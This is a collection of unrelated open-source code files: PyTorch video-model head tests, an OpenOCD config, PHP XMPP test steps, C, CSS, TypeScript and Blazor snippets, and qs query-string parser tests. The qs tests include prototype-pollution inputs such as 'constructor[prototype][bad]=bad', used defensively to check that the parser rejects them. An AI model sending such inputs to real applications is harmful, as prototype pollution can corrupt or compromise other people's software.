import torch import torch.nn as nn from mmaction.models import BaseHead, I3DHead, SlowFastHead, TSMHead, TSNHead class ExampleHead(BaseHead): # use a ExampleHead to success BaseHead def init_weights(self): pass def forward(self, x): pass def test_base_head(): head = ExampleHead(3, 400, dict(type='CrossEntropyLoss')) cls_scores = torch.rand((3, 4)) # When truth is non-empty then cls loss should be nonzero for random inputs gt_labels = torch.LongTensor([2] * 3).squeeze() losses = head.loss(cls_scores, gt_labels) assert 'loss_cls' in losses.keys() assert losses.get('loss_cls') > 0, 'cls loss should be non-zero' def test_i3d_head(): """Test loss method, layer construction, attributes and forward function in i3d head.""" i3d_head = I3DHead(num_classes=4, in_channels=2048) i3d_head.init_weights() assert i3d_head.num_classes == 4 assert i3d_head.dropout_ratio == 0.5 assert i3d_head.in_channels == 2048 assert i3d_head.init_std == 0.01 assert isinstance(i3d_head.dropout, nn.Dropout) assert i3d_head.dropout.p == i3d_head.dropout_ratio assert isinstance(i3d_head.fc_cls, nn.Linear) assert i3d_head.fc_cls.in_features == i3d_head.in_channels assert i3d_head.fc_cls.out_features == i3d_head.num_classes assert isinstance(i3d_head.avg_pool, nn.AdaptiveAvgPool3d) assert i3d_head.avg_pool.output_size == (1, 1, 1) input_shape = (3, 2048, 4, 7, 7) feat = torch.rand(input_shape) # i3d head inference cls_scores = i3d_head(feat) assert cls_scores.shape == torch.Size([3, 4]) def test_slowfast_head(): """Test loss method, layer construction, attributes and forward function in slowfast head.""" sf_head = SlowFastHead(num_classes=4, in_channels=2304) sf_head.init_weights() assert sf_head.num_classes == 4 assert sf_head.dropout_ratio == 0.8 assert sf_head.in_channels == 2304 assert sf_head.init_std == 0.01 assert isinstance(sf_head.dropout, nn.Dropout) assert sf_head.dropout.p == sf_head.dropout_ratio assert isinstance(sf_head.fc_cls, nn.Linear) assert sf_head.fc_cls.in_features == sf_head.in_channels assert sf_head.fc_cls.out_features == sf_head.num_classes assert isinstance(sf_head.avg_pool, nn.AdaptiveAvgPool3d) assert sf_head.avg_pool.output_size == (1, 1, 1) input_shape = (3, 2048, 32, 7, 7) feat_slow = torch.rand(input_shape) input_shape = (3, 256, 4, 7, 7) feat_fast = torch.rand(input_shape) sf_head = SlowFastHead(num_classes=4, in_channels=2304) cls_scores = sf_head((feat_slow, feat_fast)) assert cls_scores.shape == torch.Size([3, 4]) def test_tsn_head(): """Test loss method, layer construction, attributes and forward function in tsn head.""" tsn_head = TSNHead(num_classes=4, in_channels=2048) tsn_head.init_weights() assert tsn_head.num_classes == 4 assert tsn_head.dropout_ratio == 0.4 assert tsn_head.in_channels == 2048 assert tsn_head.init_std == 0.01 assert tsn_head.consensus.dim == 1 assert tsn_head.spatial_type == 'avg' assert isinstance(tsn_head.dropout, nn.Dropout) assert tsn_head.dropout.p == tsn_head.dropout_ratio assert isinstance(tsn_head.fc_cls, nn.Linear) assert tsn_head.fc_cls.in_features == tsn_head.in_channels assert tsn_head.fc_cls.out_features == tsn_head.num_classes assert isinstance(tsn_head.avg_pool, nn.AdaptiveAvgPool2d) assert tsn_head.avg_pool.output_size == (1, 1) input_shape = (8, 2048, 7, 7) feat = torch.rand(input_shape) # tsn head inference num_segs = input_shape[0] cls_scores = tsn_head(feat, num_segs) assert cls_scores.shape == torch.Size([1, 4]) # Test multi-class recognition multi_tsn_head = TSNHead( num_classes=4, in_channels=2048, loss_cls=dict(type='BCELossWithLogits', loss_weight=160.0), multi_class=True, label_smooth_eps=0.01) multi_tsn_head.init_weights() assert multi_tsn_head.num_classes == 4 assert multi_tsn_head.dropout_ratio == 0.4 assert multi_tsn_head.in_channels == 2048 assert multi_tsn_head.init_std == 0.01 assert multi_tsn_head.consensus.dim == 1 assert isinstance(multi_tsn_head.dropout, nn.Dropout) assert multi_tsn_head.dropout.p == multi_tsn_head.dropout_ratio assert isinstance(multi_tsn_head.fc_cls, nn.Linear) assert multi_tsn_head.fc_cls.in_features == multi_tsn_head.in_channels assert multi_tsn_head.fc_cls.out_features == multi_tsn_head.num_classes assert isinstance(multi_tsn_head.avg_pool, nn.AdaptiveAvgPool2d) assert multi_tsn_head.avg_pool.output_size == (1, 1) input_shape = (8, 2048, 7, 7) feat = torch.rand(input_shape) # multi-class tsn head inference num_segs = input_shape[0] cls_scores = tsn_head(feat, num_segs) assert cls_scores.shape == torch.Size([1, 4]) def test_tsm_head(): """Test loss method, layer construction, attributes and forward function in tsm head.""" tsm_head = TSMHead(num_classes=4, in_channels=2048) tsm_head.init_weights() assert tsm_head.num_classes == 4 assert tsm_head.dropout_ratio == 0.8 assert tsm_head.in_channels == 2048 assert tsm_head.init_std == 0.001 assert tsm_head.consensus.dim == 1 assert tsm_head.spatial_type == 'avg' assert isinstance(tsm_head.dropout, nn.Dropout) assert tsm_head.dropout.p == tsm_head.dropout_ratio assert isinstance(tsm_head.fc_cls, nn.Linear) assert tsm_head.fc_cls.in_features == tsm_head.in_channels assert tsm_head.fc_cls.out_features == tsm_head.num_classes assert isinstance(tsm_head.avg_pool, nn.AdaptiveAvgPool2d) assert tsm_head.avg_pool.output_size == 1 input_shape = (8, 2048, 7, 7) feat = torch.rand(input_shape) # tsm head inference with no init num_segs = input_shape[0] cls_scores = tsm_head(feat, num_segs) assert cls_scores.shape == torch.Size([1, 4]) # tsm head inference with init tsm_head = TSMHead(num_classes=4, in_channels=2048, temporal_pool=True) tsm_head.init_weights() cls_scores = tsm_head(feat, num_segs) assert cls_scores.shape == torch.Size([2, 4])
{ "pile_set_name": "Github" }
# # TI MSP432 LaunchPad Evaluation Kit # source [find interface/xds110.cfg] adapter_khz 2500 transport select swd source [find target/ti_msp432.cfg]
{ "pile_set_name": "Github" }
<?php /** * Copyright 2014 Fabian Grutschus. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * The views and conclusions contained in the software and documentation are those * of the authors and should not be interpreted as representing official policies, * either expressed or implied, of the copyright holders. * * @author Fabian Grutschus <[email protected]> * @copyright 2014 Fabian Grutschus. All rights reserved. * @license BSD * @link http://github.com/fabiang/xmpp */ namespace Fabiang\Xmpp\Integration; use Behat\Behat\Context\BehatContext; class BindContext extends BehatContext { /** * @Given /^Test response data for bind$/ */ public function testResponseDataForBind() { $this->getConnection()->setData(array( "<?xml version='1.0'?>" . "<stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams'>", "<stream:features><bind xmlns='urn:ietf:params:xml:ns:xmpp-bind'/></stream:features>", "<iq id='fabiang_xmpp_1234' type='result'><bind xmlns='urn:ietf:params:xml:ns:xmpp-bind'>" . "<jid>[email protected]/12345678890</jid></bind></iq>" )); } /** * @Then /^request for binding send$/ */ public function requestForBindingSend() { $buffer = $this->getConnection()->getBuffer(); assertRegExp( '#^<iq type="set" id="fabiang_xmpp_[^"]+">' . '<bind xmlns="urn:ietf:params:xml:ns:xmpp-bind">' . '<resource></resource></bind></iq>$#', $buffer[1] ); } /** * @Given /^Jid is set to options object$/ */ public function jidIsSetToOptionsObject() { assertSame('[email protected]/12345678890', $this->getConnection()->getOptions()->getJid()); } /** * * @return \Fabiang\Xmpp\Connection\Test */ public function getConnection() { return $this->getMainContext()->getConnection(); } }
{ "pile_set_name": "Github" }
#include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> in_addr_t inet_addr(const char *p) { struct in_addr a; if (!__inet_aton(p, &a)) return -1; return a.s_addr; }
{ "pile_set_name": "Github" }
<!DOCTYPE html> <meta charset="UTF-8"> <style> .layer-reference { position: absolute; height: 300px; width: 50px; background-color: lightgrey; font-family: sans-serif; text-align: center; padding-top: 5px; border: 1px solid; } .target { position: absolute; width: 450px; height: 10px; } .active { background-color: black; } .replica { background-color: green; } .spacer { height: 350px; } </style> <body> <div class="spacer"></div> <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> <script src="resources/interpolation-test.js"></script> <script> [-8, -5, -2, 1, 5, 10, 12].forEach(function(zIndex, i) { var layerReference = document.createElement('div'); layerReference.classList.add('layer-reference'); layerReference.style.zIndex = zIndex; layerReference.style.top = '0px'; layerReference.style.left = 50 + (i * 50) + 'px'; layerReference.textContent = 'Z ' + zIndex; document.body.appendChild(layerReference); }); assertInterpolation({ property: 'z-index', from: '-5', to: '5' }, [ {at: -0.3, is: '-8'}, {at: 0, is: '-5'}, {at: 0.3, is: '-2'}, {at: 0.6, is: '1'}, {at: 1, is: '5'}, {at: 1.5, is: '10'}, ]); afterTest(function() { var actives = document.querySelectorAll('.active'); var replicas = document.querySelectorAll('.replica'); for (var i = 0; i < actives.length; i++) { actives[i].style.top = 50 + (i * 40) + 'px'; replicas[i].style.top = 60 + (i * 40) + 'px'; } }); </script> </body>
{ "pile_set_name": "Github" }
{ "ver": "1.0.0", "uuid": "96a64ce0-ccbb-49ac-aca5-537d61b47f14", "type": "sprite", "wrapMode": "clamp", "filterMode": "bilinear", "subMetas": { "hall": { "ver": "1.0.3", "uuid": "91f4ddb4-d0d0-4d93-9671-c062b109acd5", "rawTextureUuid": "96a64ce0-ccbb-49ac-aca5-537d61b47f14", "trimType": "auto", "trimThreshold": 1, "rotated": false, "offsetX": 0, "offsetY": 0, "trimX": 2, "trimY": 2, "width": 1004, "height": 622, "rawWidth": 1008, "rawHeight": 626, "borderTop": 0, "borderBottom": 0, "borderLeft": 0, "borderRight": 0, "subMetas": {} } } }
{ "pile_set_name": "Github" }
export type MatchingSpecs<P> = Partial< { [K in keyof P]: P[K] extends unknown[] ? | Specification<P[K][number][]> | Readonly< | P[K][number] | Specification<P[K][number]> | MatchingSpecs<P[K][number]> >[] : P[K] extends object ? MatchingSpecs<P[K]> : P[K] | Specification<P[K]> | Specification<NonNullable<P[K]>> } > export type Assert = { equal(actual: any, expected: any, msg?: string): void deepEqual(actual: any, expected: any, msg?: string): void } type Annotations = { $topic?: string $spec?: string $description?: string } export type Specifications<P> = Annotations & MatchingSpecs<P> export type Specification<T> = Annotations & { (val: T): boolean } export type SpokFunction = <T>( t: Assert, obj: T, specifications: Specifications<T>, prefix?: string | null ) => void export type SpokFunctionAny = <P extends object, T>( t: Assert, obj: T, specifications: P, prefix?: string | null ) => void export type SpokConfig = { printSpec: boolean printDescription: boolean sound: boolean color: boolean } export type SpokAssertions = { gtz: Specification<number> gez: Specification<number> ltz: Specification<number> lez: Specification<number> array: Specification<unknown[]> number: Specification<unknown> string: Specification<unknown> function: Specification<unknown> definedObject: Specification<unknown> defined: Specification<unknown> notDefined: Specification<unknown> range(min: number, max: number): Specification<number> gt(x: number): Specification<number> ge(x: number): Specification<number> lt(x: number): Specification<number> le(x: number): Specification<number> ne(x: unknown): Specification<unknown> type(x: string): Specification<unknown> arrayElements(n: number): Specification<unknown[]> arrayElementsRange(min: number, max: number): Specification<unknown[]> startsWith(what: string): Specification<string> endsWith(what: string): Specification<string> test(regex: RegExp): Specification<string> } export type Spok = SpokFunction & SpokAssertions & SpokConfig & { any: SpokFunctionAny }
{ "pile_set_name": "Github" }
@page "/pdf/portfolio" @inject Microsoft.JSInterop.IJSRuntime JS @using System.IO @using Syncfusion.Blazor.Buttons @inject Microsoft.AspNetCore.Hosting.IWebHostEnvironment hostingEnvironment @inherits SampleBaseComponent; @*Hidden:Lines*@ @using blazor_samples.Data.FileFormats.PDF @*End:Hidden*@ <SampleDescription> <p>This sample demonstrates how to create portfolio in the PDF document. You can also extract and remove files from the PDF portfolio. This feature allows the user to bring content together from variety of sources including documents, drawings, images, emails, spreadsheets, and web pages.</p> </SampleDescription> <ActionDescription> <p>More information about the portfolio can be found in this documentation <a target='_blank' href='https://help.syncfusion.com/file-formats/pdf/working-with-portfolio'>section.</a></p> </ActionDescription> <div class="control-section"> <p style="font-weight:normal">Click the button to view a PDF document generated by Essential PDF. Please note that Adobe Reader or its equivalent is required to view the resultant document. </p> <div class="button-section"> <div id="button-control"> <div class="row"> <div> <SfButton @onclick="GeneratePDF">Generate PDF</SfButton> </div> </div> </div> </div> </div> <style> .radio-control { margin: 0 0 5% 0; } .control-section .row { margin: 10px 0; } </style> @code { /// <summary> /// Create and download the simple PDF document ///<summary> protected async void GeneratePDF(MouseEventArgs args) { PortfolioService service = new PortfolioService(hostingEnvironment); MemoryStream documentStream = service.CreatePdfDocument(); await JS.SaveAs("Portfolio.pdf", documentStream.ToArray()); } }
{ "pile_set_name": "Github" }
/* eslint no-extend-native:0 */ // Load modules var Code = require('code'); var Lab = require('lab'); var Qs = require('../'); // Declare internals var internals = {}; // Test shortcuts var lab = exports.lab = Lab.script(); var expect = Code.expect; var describe = lab.experiment; var it = lab.test; describe('parse()', function () { it('parses a simple string', function (done) { expect(Qs.parse('0=foo')).to.deep.equal({ '0': 'foo' }); expect(Qs.parse('foo=c++')).to.deep.equal({ foo: 'c ' }); expect(Qs.parse('a[>=]=23')).to.deep.equal({ a: { '>=': '23' } }); expect(Qs.parse('a[<=>]==23')).to.deep.equal({ a: { '<=>': '=23' } }); expect(Qs.parse('a[==]=23')).to.deep.equal({ a: { '==': '23' } }); expect(Qs.parse('foo', { strictNullHandling: true })).to.deep.equal({ foo: null }); expect(Qs.parse('foo' )).to.deep.equal({ foo: '' }); expect(Qs.parse('foo=')).to.deep.equal({ foo: '' }); expect(Qs.parse('foo=bar')).to.deep.equal({ foo: 'bar' }); expect(Qs.parse(' foo = bar = baz ')).to.deep.equal({ ' foo ': ' bar = baz ' }); expect(Qs.parse('foo=bar=baz')).to.deep.equal({ foo: 'bar=baz' }); expect(Qs.parse('foo=bar&bar=baz')).to.deep.equal({ foo: 'bar', bar: 'baz' }); expect(Qs.parse('foo2=bar2&baz2=')).to.deep.equal({ foo2: 'bar2', baz2: '' }); expect(Qs.parse('foo=bar&baz', { strictNullHandling: true })).to.deep.equal({ foo: 'bar', baz: null }); expect(Qs.parse('foo=bar&baz')).to.deep.equal({ foo: 'bar', baz: '' }); expect(Qs.parse('cht=p3&chd=t:60,40&chs=250x100&chl=Hello|World')).to.deep.equal({ cht: 'p3', chd: 't:60,40', chs: '250x100', chl: 'Hello|World' }); done(); }); it('allows enabling dot notation', function (done) { expect(Qs.parse('a.b=c')).to.deep.equal({ 'a.b': 'c' }); expect(Qs.parse('a.b=c', { allowDots: true })).to.deep.equal({ a: { b: 'c' } }); done(); }); it('parses a single nested string', function (done) { expect(Qs.parse('a[b]=c')).to.deep.equal({ a: { b: 'c' } }); done(); }); it('parses a double nested string', function (done) { expect(Qs.parse('a[b][c]=d')).to.deep.equal({ a: { b: { c: 'd' } } }); done(); }); it('defaults to a depth of 5', function (done) { expect(Qs.parse('a[b][c][d][e][f][g][h]=i')).to.deep.equal({ a: { b: { c: { d: { e: { f: { '[g][h]': 'i' } } } } } } }); done(); }); it('only parses one level when depth = 1', function (done) { expect(Qs.parse('a[b][c]=d', { depth: 1 })).to.deep.equal({ a: { b: { '[c]': 'd' } } }); expect(Qs.parse('a[b][c][d]=e', { depth: 1 })).to.deep.equal({ a: { b: { '[c][d]': 'e' } } }); done(); }); it('parses a simple array', function (done) { expect(Qs.parse('a=b&a=c')).to.deep.equal({ a: ['b', 'c'] }); done(); }); it('parses an explicit array', function (done) { expect(Qs.parse('a[]=b')).to.deep.equal({ a: ['b'] }); expect(Qs.parse('a[]=b&a[]=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a[]=b&a[]=c&a[]=d')).to.deep.equal({ a: ['b', 'c', 'd'] }); done(); }); it('parses a mix of simple and explicit arrays', function (done) { expect(Qs.parse('a=b&a[]=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a[]=b&a=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a[0]=b&a=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a=b&a[0]=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a[1]=b&a=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a=b&a[1]=c')).to.deep.equal({ a: ['b', 'c'] }); done(); }); it('parses a nested array', function (done) { expect(Qs.parse('a[b][]=c&a[b][]=d')).to.deep.equal({ a: { b: ['c', 'd'] } }); expect(Qs.parse('a[>=]=25')).to.deep.equal({ a: { '>=': '25' } }); done(); }); it('allows to specify array indices', function (done) { expect(Qs.parse('a[1]=c&a[0]=b&a[2]=d')).to.deep.equal({ a: ['b', 'c', 'd'] }); expect(Qs.parse('a[1]=c&a[0]=b')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a[1]=c')).to.deep.equal({ a: ['c'] }); done(); }); it('limits specific array indices to 20', function (done) { expect(Qs.parse('a[20]=a')).to.deep.equal({ a: ['a'] }); expect(Qs.parse('a[21]=a')).to.deep.equal({ a: { '21': 'a' } }); done(); }); it('supports keys that begin with a number', function (done) { expect(Qs.parse('a[12b]=c')).to.deep.equal({ a: { '12b': 'c' } }); done(); }); it('supports encoded = signs', function (done) { expect(Qs.parse('he%3Dllo=th%3Dere')).to.deep.equal({ 'he=llo': 'th=ere' }); done(); }); it('is ok with url encoded strings', function (done) { expect(Qs.parse('a[b%20c]=d')).to.deep.equal({ a: { 'b c': 'd' } }); expect(Qs.parse('a[b]=c%20d')).to.deep.equal({ a: { b: 'c d' } }); done(); }); it('allows brackets in the value', function (done) { expect(Qs.parse('pets=["tobi"]')).to.deep.equal({ pets: '["tobi"]' }); expect(Qs.parse('operators=[">=", "<="]')).to.deep.equal({ operators: '[">=", "<="]' }); done(); }); it('allows empty values', function (done) { expect(Qs.parse('')).to.deep.equal({}); expect(Qs.parse(null)).to.deep.equal({}); expect(Qs.parse(undefined)).to.deep.equal({}); done(); }); it('transforms arrays to objects', function (done) { expect(Qs.parse('foo[0]=bar&foo[bad]=baz')).to.deep.equal({ foo: { '0': 'bar', bad: 'baz' } }); expect(Qs.parse('foo[bad]=baz&foo[0]=bar')).to.deep.equal({ foo: { bad: 'baz', '0': 'bar' } }); expect(Qs.parse('foo[bad]=baz&foo[]=bar')).to.deep.equal({ foo: { bad: 'baz', '0': 'bar' } }); expect(Qs.parse('foo[]=bar&foo[bad]=baz')).to.deep.equal({ foo: { '0': 'bar', bad: 'baz' } }); expect(Qs.parse('foo[bad]=baz&foo[]=bar&foo[]=foo')).to.deep.equal({ foo: { bad: 'baz', '0': 'bar', '1': 'foo' } }); expect(Qs.parse('foo[0][a]=a&foo[0][b]=b&foo[1][a]=aa&foo[1][b]=bb')).to.deep.equal({ foo: [{ a: 'a', b: 'b' }, { a: 'aa', b: 'bb' }] }); expect(Qs.parse('a[]=b&a[t]=u&a[hasOwnProperty]=c')).to.deep.equal({ a: { '0': 'b', t: 'u', c: true } }); expect(Qs.parse('a[]=b&a[hasOwnProperty]=c&a[x]=y')).to.deep.equal({ a: { '0': 'b', '1': 'c', x: 'y' } }); done(); }); it('transforms arrays to objects (dot notation)', function (done) { expect(Qs.parse('foo[0].baz=bar&fool.bad=baz', { allowDots: true })).to.deep.equal({ foo: [{ baz: 'bar' }], fool: { bad: 'baz' } }); expect(Qs.parse('foo[0].baz=bar&fool.bad.boo=baz', { allowDots: true })).to.deep.equal({ foo: [{ baz: 'bar' }], fool: { bad: { boo: 'baz' } } }); expect(Qs.parse('foo[0][0].baz=bar&fool.bad=baz', { allowDots: true })).to.deep.equal({ foo: [[{ baz: 'bar' }]], fool: { bad: 'baz' } }); expect(Qs.parse('foo[0].baz[0]=15&foo[0].bar=2', { allowDots: true })).to.deep.equal({ foo: [{ baz: ['15'], bar: '2' }] }); expect(Qs.parse('foo[0].baz[0]=15&foo[0].baz[1]=16&foo[0].bar=2', { allowDots: true })).to.deep.equal({ foo: [{ baz: ['15', '16'], bar: '2' }] }); expect(Qs.parse('foo.bad=baz&foo[0]=bar', { allowDots: true })).to.deep.equal({ foo: { bad: 'baz', '0': 'bar' } }); expect(Qs.parse('foo.bad=baz&foo[]=bar', { allowDots: true })).to.deep.equal({ foo: { bad: 'baz', '0': 'bar' } }); expect(Qs.parse('foo[]=bar&foo.bad=baz', { allowDots: true })).to.deep.equal({ foo: { '0': 'bar', bad: 'baz' } }); expect(Qs.parse('foo.bad=baz&foo[]=bar&foo[]=foo', { allowDots: true })).to.deep.equal({ foo: { bad: 'baz', '0': 'bar', '1': 'foo' } }); expect(Qs.parse('foo[0].a=a&foo[0].b=b&foo[1].a=aa&foo[1].b=bb', { allowDots: true })).to.deep.equal({ foo: [{ a: 'a', b: 'b' }, { a: 'aa', b: 'bb' }] }); done(); }); it('can add keys to objects', function (done) { expect(Qs.parse('a[b]=c&a=d')).to.deep.equal({ a: { b: 'c', d: true } }); done(); }); it('correctly prunes undefined values when converting an array to an object', function (done) { expect(Qs.parse('a[2]=b&a[99999999]=c')).to.deep.equal({ a: { '2': 'b', '99999999': 'c' } }); done(); }); it('supports malformed uri characters', function (done) { expect(Qs.parse('{%:%}', { strictNullHandling: true })).to.deep.equal({ '{%:%}': null }); expect(Qs.parse('{%:%}=')).to.deep.equal({ '{%:%}': '' }); expect(Qs.parse('foo=%:%}')).to.deep.equal({ foo: '%:%}' }); done(); }); it('doesn\'t produce empty keys', function (done) { expect(Qs.parse('_r=1&')).to.deep.equal({ '_r': '1' }); done(); }); it('cannot access Object prototype', function (done) { Qs.parse('constructor[prototype][bad]=bad'); Qs.parse('bad[constructor][prototype][bad]=bad'); expect(typeof Object.prototype.bad).to.equal('undefined'); done(); }); it('parses arrays of objects', function (done) { expect(Qs.parse('a[][b]=c')).to.deep.equal({ a: [{ b: 'c' }] }); expect(Qs.parse('a[0][b]=c')).to.deep.equal({ a: [{ b: 'c' }] }); done(); }); it('allows for empty strings in arrays', function (done) { expect(Qs.parse('a[]=b&a[]=&a[]=c')).to.deep.equal({ a: ['b', '', 'c'] }); expect(Qs.parse('a[0]=b&a[1]&a[2]=c&a[19]=', { strictNullHandling: true, arrayLimit: 20 })).to.deep.equal({ a: ['b', null, 'c', ''] }); expect(Qs.parse('a[]=b&a[]&a[]=c&a[]=', { strictNullHandling: true, arrayLimit: 0 })).to.deep.equal({ a: ['b', null, 'c', ''] }); expect(Qs.parse('a[0]=b&a[1]=&a[2]=c&a[19]', { strictNullHandling: true, arrayLimit: 20 })).to.deep.equal({ a: ['b', '', 'c', null] }); expect(Qs.parse('a[]=b&a[]=&a[]=c&a[]', { strictNullHandling: true, arrayLimit: 0 })).to.deep.equal({ a: ['b', '', 'c', null] }); expect(Qs.parse('a[]=&a[]=b&a[]=c')).to.deep.equal({ a: ['', 'b', 'c'] }); done(); }); it('compacts sparse arrays', function (done) { expect(Qs.parse('a[10]=1&a[2]=2')).to.deep.equal({ a: ['2', '1'] }); done(); }); it('parses semi-parsed strings', function (done) { expect(Qs.parse({ 'a[b]': 'c' })).to.deep.equal({ a: { b: 'c' } }); expect(Qs.parse({ 'a[b]': 'c', 'a[d]': 'e' })).to.deep.equal({ a: { b: 'c', d: 'e' } }); done(); }); it('parses buffers correctly', function (done) { var b = new Buffer('test'); expect(Qs.parse({ a: b })).to.deep.equal({ a: b }); done(); }); it('continues parsing when no parent is found', function (done) { expect(Qs.parse('[]=&a=b')).to.deep.equal({ '0': '', a: 'b' }); expect(Qs.parse('[]&a=b', { strictNullHandling: true })).to.deep.equal({ '0': null, a: 'b' }); expect(Qs.parse('[foo]=bar')).to.deep.equal({ foo: 'bar' }); done(); }); it('does not error when parsing a very long array', function (done) { var str = 'a[]=a'; while (Buffer.byteLength(str) < 128 * 1024) { str += '&' + str; } expect(function () { Qs.parse(str); }).to.not.throw(); done(); }); it('should not throw when a native prototype has an enumerable property', { parallel: false }, function (done) { Object.prototype.crash = ''; Array.prototype.crash = ''; expect(Qs.parse.bind(null, 'a=b')).to.not.throw(); expect(Qs.parse('a=b')).to.deep.equal({ a: 'b' }); expect(Qs.parse.bind(null, 'a[][b]=c')).to.not.throw(); expect(Qs.parse('a[][b]=c')).to.deep.equal({ a: [{ b: 'c' }] }); delete Object.prototype.crash; delete Array.prototype.crash; done(); }); it('parses a string with an alternative string delimiter', function (done) { expect(Qs.parse('a=b;c=d', { delimiter: ';' })).to.deep.equal({ a: 'b', c: 'd' }); done(); }); it('parses a string with an alternative RegExp delimiter', function (done) { expect(Qs.parse('a=b; c=d', { delimiter: /[;,] */ })).to.deep.equal({ a: 'b', c: 'd' }); done(); }); it('does not use non-splittable objects as delimiters', function (done) { expect(Qs.parse('a=b&c=d', { delimiter: true })).to.deep.equal({ a: 'b', c: 'd' }); done(); }); it('allows overriding parameter limit', function (done) { expect(Qs.parse('a=b&c=d', { parameterLimit: 1 })).to.deep.equal({ a: 'b' }); done(); }); it('allows setting the parameter limit to Infinity', function (done) { expect(Qs.parse('a=b&c=d', { parameterLimit: Infinity })).to.deep.equal({ a: 'b', c: 'd' }); done(); }); it('allows overriding array limit', function (done) { expect(Qs.parse('a[0]=b', { arrayLimit: -1 })).to.deep.equal({ a: { '0': 'b' } }); expect(Qs.parse('a[-1]=b', { arrayLimit: -1 })).to.deep.equal({ a: { '-1': 'b' } }); expect(Qs.parse('a[0]=b&a[1]=c', { arrayLimit: 0 })).to.deep.equal({ a: { '0': 'b', '1': 'c' } }); done(); }); it('allows disabling array parsing', function (done) { expect(Qs.parse('a[0]=b&a[1]=c', { parseArrays: false })).to.deep.equal({ a: { '0': 'b', '1': 'c' } }); done(); }); it('parses an object', function (done) { var input = { 'user[name]': { 'pop[bob]': 3 }, 'user[email]': null }; var expected = { 'user': { 'name': { 'pop[bob]': 3 }, 'email': null } }; var result = Qs.parse(input); expect(result).to.deep.equal(expected); done(); }); it('parses an object in dot notation', function (done) { var input = { 'user.name': { 'pop[bob]': 3 }, 'user.email.': null }; var expected = { 'user': { 'name': { 'pop[bob]': 3 }, 'email': null } }; var result = Qs.parse(input, { allowDots: true }); expect(result).to.deep.equal(expected); done(); }); it('parses an object and not child values', function (done) { var input = { 'user[name]': { 'pop[bob]': { 'test': 3 } }, 'user[email]': null }; var expected = { 'user': { 'name': { 'pop[bob]': { 'test': 3 } }, 'email': null } }; var result = Qs.parse(input); expect(result).to.deep.equal(expected); done(); }); it('does not blow up when Buffer global is missing', function (done) { var tempBuffer = global.Buffer; delete global.Buffer; var result = Qs.parse('a=b&c=d'); global.Buffer = tempBuffer; expect(result).to.deep.equal({ a: 'b', c: 'd' }); done(); }); it('does not crash when parsing circular references', function (done) { var a = {}; a.b = a; var parsed; expect(function () { parsed = Qs.parse({ 'foo[bar]': 'baz', 'foo[baz]': a }); }).to.not.throw(); expect(parsed).to.contain('foo'); expect(parsed.foo).to.contain('bar', 'baz'); expect(parsed.foo.bar).to.equal('baz'); expect(parsed.foo.baz).to.deep.equal(a); done(); }); it('parses plain objects correctly', function (done) { var a = Object.create(null); a.b = 'c'; expect(Qs.parse(a)).to.deep.equal({ b: 'c' }); var result = Qs.parse({ a: a }); expect(result).to.contain('a'); expect(result.a).to.deep.equal(a); done(); }); it('parses dates correctly', function (done) { var now = new Date(); expect(Qs.parse({ a: now })).to.deep.equal({ a: now }); done(); }); it('parses regular expressions correctly', function (done) { var re = /^test$/; expect(Qs.parse({ a: re })).to.deep.equal({ a: re }); done(); }); it('can allow overwriting prototype properties', function (done) { expect(Qs.parse('a[hasOwnProperty]=b', { allowPrototypes: true })).to.deep.equal({ a: { hasOwnProperty: 'b' } }, { prototype: false }); expect(Qs.parse('hasOwnProperty=b', { allowPrototypes: true })).to.deep.equal({ hasOwnProperty: 'b' }, { prototype: false }); done(); }); it('can return plain objects', function (done) { var expected = Object.create(null); expected.a = Object.create(null); expected.a.b = 'c'; expected.a.hasOwnProperty = 'd'; expect(Qs.parse('a[b]=c&a[hasOwnProperty]=d', { plainObjects: true })).to.deep.equal(expected); expect(Qs.parse(null, { plainObjects: true })).to.deep.equal(Object.create(null)); var expectedArray = Object.create(null); expectedArray.a = Object.create(null); expectedArray.a['0'] = 'b'; expectedArray.a.c = 'd'; expect(Qs.parse('a[]=b&a[c]=d', { plainObjects: true })).to.deep.equal(expectedArray); done(); }); });
{ "pile_set_name": "Github" }
